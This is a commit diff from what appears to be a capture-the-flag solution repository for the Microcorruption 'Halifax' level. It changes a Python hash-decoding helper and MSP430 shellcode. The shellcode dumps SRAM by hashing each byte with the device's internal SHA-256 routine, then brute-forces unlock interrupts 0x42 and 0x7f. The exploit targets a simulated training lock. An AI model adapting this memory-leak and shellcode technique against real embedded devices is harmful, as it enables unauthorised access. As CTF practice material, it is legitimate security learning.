25-Halifax: Fix typo in script, update payload for clarity and INT 0x42

25-Halifax/halifax.py

@@ -50,7 +50,7 @@ def main():
         key = target[loc:loc+depth]
         try:
             value = all_hashes[key]
-            print(f"{value:x}", end="")
+            print(f"{value:02x}", end="")
 
         except KeyError:
             value = 0x00

25-Halifax/shellcode.asm

@@ -5,9 +5,9 @@
 const:
 .define msize  0x1    ; length of each hash in bytes
 .define hsize  0x3    ; bytes kept per hash (only needs to be 3 to determine 1 byte of sram)
-.define slen   0x140  ; number of bytes in sram to dump
-.define olen   0x3c0  ; number of bytes in hash array
-.define oaddr  0x7000 ; address of the big hash array
+.define sr_len 0x140  ; number of bytes in sram to dump
+.define ha_len 0x3c0  ; number of bytes in hash array (hsize * sr_len)
+.define haddr  0x7000 ; address of the big hash array
 .define iaddr  0x8000 ; address of the sram input buffer
 .define kaddr  0x9000 ; address of the key buffer
 external_data:
@@ -23,37 +23,27 @@ external_func:
 .define puts            #0x4586
 ; memcpy(void *dest, void *src, size_t len)
 .define memcpy          #0x45a4
-; sha256_internal(void * sram_addr, size_t sram_len, void * sha_buf)
+; sha256_internal(void * sram_addr, size_t sr_len, void * sha_buf)
 .define sha256_internal #0x45b6
 ; memset(void* buf, char value, size_t length)
 .define memset          #0x45c8
 
-setup_variables:
-push  r4
-push  r5
-push  r6
-push  r7
-mov   #msize, r4    ; message_size
-mov   #hsize, r5    ; bytes_per_hash
-mov   #slen,  r6    ; sram_length
-mov   #olen,  r7    ; output_length
-
 get_sram_hashes:
 clr   r11            ; loop variable in r11
-mov   r4, r14        ; r14 = 1
-mov   #oaddr, r13    ; set destination to 0x8000
+mov   #msize, r14    ; r14 = 1
+mov   #haddr, r13    ; set destination to 0x8000
 sr_loop:
 mov   r11, r15       ; mov addr r15
 call  sha256_internal; <sha256_internal>
-add   r5, r13        ; keep 3 bytes of the output
+add   #hsize, r13    ; keep 3 bytes of the output
 inc   r11            ; inc r11
-cmp   r6, r11        ; do that 0x1000 times
+cmp   #sr_len, r11        ; do that 0x1000 times
 jnc   sr_loop
 
 print_hex:
 clr   r11;
 ph_loop:
-mov.b oaddr(r11), r14
+mov.b haddr(r11), r14
 mov.b r14, r15
 rra   r15            ; using rra here instead of rra.b means the value won't roll into the highest bit
 rra   r15            ; which negates the need to and 0xf, r15
@@ -66,7 +56,7 @@ call  putchar        ; <putchar>
 mov.b HEX_LUT(r14), r15
 call  putchar        ; <putchar>
 inc   r11            ; inc r11
-cmp   r7, r11        ; do that sram_length*3 times
+cmp   #ha_len, r11        ; do that sram_length*3 times
 jnc   ph_loop
 
 mov.b #0xa, r15      ; '\n'
@@ -75,43 +65,35 @@ call  #0x4578        ; putchar ('\n')
 
 take_input:
 ; 3e4040003f400090b0126845
-mov   r6, r14
+mov   #sr_len, r14
 mov   #iaddr, r15
 call  getsn          ; <getsn>
 
 check_all_passwords:
-;for i in 0..slen:
-clr  r9
+;for i in 0..sr_len:
+clr   r9
 pw_loop:
-; memset(kaddr, 0, 0x20)
-mov  #20, r13
-clr  r14
-mov  #kaddr, r15
-call memset
-
 ; 	memcpy(kaddr, iaddr + i, len)
-mov  #10, r13
-mov  #iaddr, r14
-add  r9, r14
-mov  #kaddr, r15
-call memcpy
-; sha256_internal(s_addr, len, kaddr)
-mov   #kaddr, r13    ; set buffer to 0x9000
-mov   #0x0010, r14   ; set length to 0x10
-mov   r9, r15
-call  sha256_internal
+mov   #10, r13
+mov   #iaddr, r14
+add   r9, r14
+mov   #kaddr, r15
+call  memcpy
+; INT (0x42, key)
+push  #kaddr
+push  #42
+call  INT
+add   #4, sp
 ; INT(7f)
 unlock7f:
-mov   #0x7f, r15
+push  #0
+push  #0
+push  #7f
 call  INT
-
+add   #6, sp
 inc   r9
-cmp   r6, r9
+cmp   #sr_len, r9
 jl    pw_loop
 
-teardown_variables:
-pop   r7
-pop   r6
-pop   r5
-pop   r4
+end:
 ret